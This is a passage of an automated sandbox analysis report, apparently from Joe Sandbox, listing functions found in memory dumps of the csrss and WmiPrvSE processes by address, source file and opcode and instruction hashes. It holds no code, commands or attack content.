                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae20000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction ID: 0070a4db9c6702c52058f24c164babd924dd2ad746f39f15433760fc5179e36d
                                      • Opcode Fuzzy Hash: bc4a196b34808cfd6b84f2a57bb201bd680e12675eec2e2c3e975727098e516a
                                      • Instruction Fuzzy Hash: 7BE04F73A8C41687E765BE20C5515BA3387BFD4354F3402F6D02A871C1EDBC66068642
                                      Function 00007FFB4AE4D6F9 Relevance: .0, Instructions: 21COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c82bf6c9e263984fc9b5c7d0e90993a7ee158967d6b0a81b2148b56e3c0bc204
                                      • Instruction ID: 45e2eebe902de0fd7e1acde84c48574b031983042b5d42cafd33742a365dc4fd
                                      • Opcode Fuzzy Hash: c82bf6c9e263984fc9b5c7d0e90993a7ee158967d6b0a81b2148b56e3c0bc204
                                      • Instruction Fuzzy Hash: 2AE01A6294E7C44FC74BAB3488A89417F64AE1721174A40EBC085CF1F3D9199849C711
                                      Function 00007FFB4AE41E10 Relevance: .0, Instructions: 18COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                      Function 00007FFB4AE46D78 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction ID: 9de1e2994fea26cdf7ad3255474e1c9d0e7d0ee054989b0168b0aa26bfda795c
                                      • Opcode Fuzzy Hash: d31f381c67c792aa8b9a58807c947a1ed5e3463b8d19660a1fa6eb388fe299d9
                                      • Instruction Fuzzy Hash: 26D01234B949044F870CBA38C85D8747395EB6A2177E544A9D00AC72B1D96ADC89CB81
                                      Function 00007FFB4AE4B618 Relevance: .0, Instructions: 17COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae41000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction ID: 8f09ab4a651fb39573b1301ec7c35e3ecac32723bf79141849bfce3baf0314c2
                                      • Opcode Fuzzy Hash: 2917f0a7ebe4bb5b5e98b73bb87c05757e37cc19def6ec39ee00e5dc13468594
                                      • Instruction Fuzzy Hash: 2ED01234B949044F8B0CBE38C8998747395EB6A216BA540E9D00AC72B1D96ADC89C741
                                      Function 00007FFB4AE106AD Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: fe22828c588cfddbaea4adf16c034d2e6fb1e10eaf42f83b0b44b4f670da0d70
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: 4CC08CE0DCF53F00B4407D3ED7020BCA908BBC8220FF000F3C02C80085AC4D20D50146
                                      Function 00007FFB4AE112B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: 38a35cc4f78d43621fd59b677c9d7cf33c0390bd8621f7ac56e61f66798fa5de
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: EBC08C304548088FC948FF38C88482437A0FB0D214BE100D0E009CB170E219DCC0C740
                                      Function 00007FFB4AE136E2 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6aaf4b019fa77308620e4be71465424b4aa43b2f278b4d2658964646ad33ed13
                                      • Instruction ID: 823343f87304f63227704f98d70537c48347cbf73da577dbc4df2e067a16ae65
                                      • Opcode Fuzzy Hash: 6aaf4b019fa77308620e4be71465424b4aa43b2f278b4d2658964646ad33ed13
                                      • Instruction Fuzzy Hash: 76C08C80E0DC2652F12B3628C52127E08429F40700FE00078E42FD22CECE0E1A231282
                                      Function 00007FFB4AE106D0 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: 81c2a12a3cbd04e33625413bd8526c532172944c35fe772657fb1c371c661f8b
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: C1B01290CDE43F00B4047D7A4A42074B844BB88100FF400F0D41C80085E88D14A40242
                                      Function 00007FFB4AE11958 Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: 5a808540bb85373f25323aeca6513dfecf496581c33cce77687c690daf4d83f2
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash:

                                      Non-executed Functions

                                      Function 00007FFB4AE109B0 Relevance: 5.2, Strings: 4, Instructions: 193COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000028.00000002.1987268607.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_40_2_7ffb4ae10000_csrss.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction ID: b025d66e3f5e36446bec3f6354de4736c738368f86a47395ebb5d53150d88d65
                                      • Opcode Fuzzy Hash: e8937fa86d39937fabd692b3136fc44fc5e96aa5befe0eb9dfa70bf790ed1f41
                                      • Instruction Fuzzy Hash: 1151C2D7A0E63285E11336FCF4011FD5B4C9F81275B1886B7DA4E990878E8861BB92F5

                                      Executed Functions

                                      Function 00007FFB4AE10D48 Relevance: 1.5, Strings: 1, Instructions: 268COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Z_H
                                      • API String ID: 0-3267294416
                                      • Opcode ID: 1cedae93df75a641e1f4de021f1693672b90073017a1fd820c084512020bbbfa
                                      • Instruction ID: 7f2724b492e66b17f7a623cf187495e92b7739ac1f0ff40630dd6e4c5d7a25f2
                                      • Opcode Fuzzy Hash: 1cedae93df75a641e1f4de021f1693672b90073017a1fd820c084512020bbbfa
                                      • Instruction Fuzzy Hash: ED91DDB191CAA98FE789EF68C8667B97FE1FB5A300F5001BEC049D72D6CB7818158741
                                      Function 00007FFB4AE108D0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 181d768770e8af3738453db0207ad2e5f75ef8532b22fdccf16ab6592c7c65b6
                                      • Instruction ID: c0e727edc9009f3846f224cc3ade525a86a12387d3e2cf04853ad0fd3260cef5
                                      • Opcode Fuzzy Hash: 181d768770e8af3738453db0207ad2e5f75ef8532b22fdccf16ab6592c7c65b6
                                      • Instruction Fuzzy Hash: 13415BA2A4D6B54EE306BBB8E09A1FD7F84DF45334B2445FFD94EC7193CD0868528291
                                      Function 00007FFB4AE10960 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 5889c53bd20c76be5393c005330bc6e9ce54005a896dd6c6b439a7558f3f899d
                                      • Instruction ID: 9829c82409fdeb43eaa8b61145f5b76bad5a7d450c77137c4b7d4067e2165dae
                                      • Opcode Fuzzy Hash: 5889c53bd20c76be5393c005330bc6e9ce54005a896dd6c6b439a7558f3f899d
                                      • Instruction Fuzzy Hash: B23145A1A4EA661EF315BB7CE09B5F97BC9EF45321B6401FED80EC71D3CC0868424295
                                      Function 00007FFB4AE10998 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: d050395c1b8bc8bc214fa6e484df33ed69180af22b8ad599449785403c46793f
                                      • Instruction ID: 51361e10830d42760bb09292f10e389289bf221ca1e8e610dbc56b90c5f2fb34
                                      • Opcode Fuzzy Hash: d050395c1b8bc8bc214fa6e484df33ed69180af22b8ad599449785403c46793f
                                      • Instruction Fuzzy Hash: 4C3157A0B4D9A90FE749BF3CC09A6B97BC6EF59310B6401FDD44DC32D3CD1498428281
                                      Function 00007FFB4AE10908 Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction ID: 973cd82c01224f201391db865d50190ccd7ba8ea30c81ac30c4862974add1702
                                      • Opcode Fuzzy Hash: 335d98c78140ecc7cd7e3cce921f4542a24ea469f9cd91377458518bb7704248
                                      • Instruction Fuzzy Hash: 2D21B63130C8184FD768FE1CE889EB977D5FB5932171501BAE59AC7226D911EC8287C1
                                      Function 00007FFB4AE1116D Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f86ced9c166c1f0efc1b4692d2f0c7d35ceaad7af3e8c4242bbd22f57258e58e
                                      • Instruction ID: 017ed5d92c411970891afa63d7efddd52e5fb81d34e655d3973d32c89ec97956
                                      • Opcode Fuzzy Hash: f86ced9c166c1f0efc1b4692d2f0c7d35ceaad7af3e8c4242bbd22f57258e58e
                                      • Instruction Fuzzy Hash: 7E31AF71A0D65A8FDB45FF78C8559B97BE0FF59310B2405FEC01AD72A2DB29A441CB40
                                      Function 00007FFB4AE10C6C Relevance: .0, Instructions: 26COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction ID: 90e3b4530d58e859959e78031070858628e3718b7be88cdb6309b45923bf29c3
                                      • Opcode Fuzzy Hash: 4a4c35c1d2d2ffc1527e1e20dc18a91ecb7f6be5fddac640b694898b74ee93e9
                                      • Instruction Fuzzy Hash: DEF03A74D48259DFEB10FF68C5845ADBFF0FF44300F3045A5D42197244EA345A448B80
                                      Function 00007FFB4AE154B4 Relevance: .0, Instructions: 22COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction ID: 0ee713b78647d20b527666bb102ad91e0ec0da5f6ac01c6a044c92693e35cf69
                                      • Opcode Fuzzy Hash: 42e5b016fa398c5436d0dc47638afbd19aa405c7bb2db29d5ccadb24c69579e5
                                      • Instruction Fuzzy Hash: 97E0ED70A4C1368AFB94BD24D9507B966A4FB85310F7440F89A5E933C2DD29AE448745
                                      Function 00007FFB4AE106AD Relevance: .0, Instructions: 13COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction ID: fe22828c588cfddbaea4adf16c034d2e6fb1e10eaf42f83b0b44b4f670da0d70
                                      • Opcode Fuzzy Hash: c3b7aab64dee838a295e689a3a798708cac2788130635451790f04a3e475d4e4
                                      • Instruction Fuzzy Hash: 4CC08CE0DCF53F00B4407D3ED7020BCA908BBC8220FF000F3C02C80085AC4D20D50146
                                      Function 00007FFB4AE112B8 Relevance: .0, Instructions: 12COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction ID: 38a35cc4f78d43621fd59b677c9d7cf33c0390bd8621f7ac56e61f66798fa5de
                                      • Opcode Fuzzy Hash: fc83376b931f8ce946cf24d21685bfbd0b7da6e4063c349d0c0860404292c2a9
                                      • Instruction Fuzzy Hash: EBC08C304548088FC948FF38C88482437A0FB0D214BE100D0E009CB170E219DCC0C740
                                      Function 00007FFB4AE136E2 Relevance: .0, Instructions: 10COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1fca8b7b080dbdb2328070ac58729fadafce1110a283f0a4e50246b21ade122e
                                      • Instruction ID: 5bafa4d6c93cf6864faf2d5094da311f52cb99e638faa6bfc7df33e3b699d841
                                      • Opcode Fuzzy Hash: 1fca8b7b080dbdb2328070ac58729fadafce1110a283f0a4e50246b21ade122e
                                      • Instruction Fuzzy Hash: 4BC08C90E0DD2652F22B3628C1222BE08429F40700FE0007CE42EE62CECE0E1A2212C2
                                      Function 00007FFB4AE106D0 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction ID: 81c2a12a3cbd04e33625413bd8526c532172944c35fe772657fb1c371c661f8b
                                      • Opcode Fuzzy Hash: 3412fc062b0ff17e6a50f7d6a26cba6d1f2ed094b5b7e19693b61daa9f350ee5
                                      • Instruction Fuzzy Hash: C1B01290CDE43F00B4047D7A4A42074B844BB88100FF400F0D41C80085E88D14A40242
                                      Function 00007FFB4AE11958 Relevance: .0, Instructions: 2COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002D.00000002.1913123013.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_45_2_7ffb4ae10000_WmiPrvSE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction ID: 5a808540bb85373f25323aeca6513dfecf496581c33cce77687c690daf4d83f2
                                      • Opcode Fuzzy Hash: 38e54fe49fa15eae383b72e86048e396ba71ef1e0d2bbbab247e4a4d3eb648cb
                                      • Instruction Fuzzy Hash: